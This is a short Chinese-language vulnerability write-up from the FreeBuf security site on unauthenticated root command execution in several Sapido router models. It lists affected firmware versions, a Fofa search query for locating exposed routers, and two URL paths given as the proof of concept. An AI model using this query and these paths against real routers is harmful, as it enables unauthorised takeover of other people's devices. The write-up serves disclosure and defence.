freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Sapido多款路由器命令执行漏洞
2021-11-16 16:53:21

漏洞简介

Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。
http://www.sapido.com.tw/TC/home.htm
影响版本

BR270n-v2.1.03
    BRC76n-v2.1.03
    GR297-v2.1.3
    RB1732-v2.0.43

漏洞复现

Fofa:app="Sapido-路由器"

图片.png

登录页面

图片.png

**POC

http://x.x.x.x/syscmd.asp

http://x.x.x.x/syscmd.htm**

图片.png

图片.png

图片.png

# web安全 # 漏洞复现
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者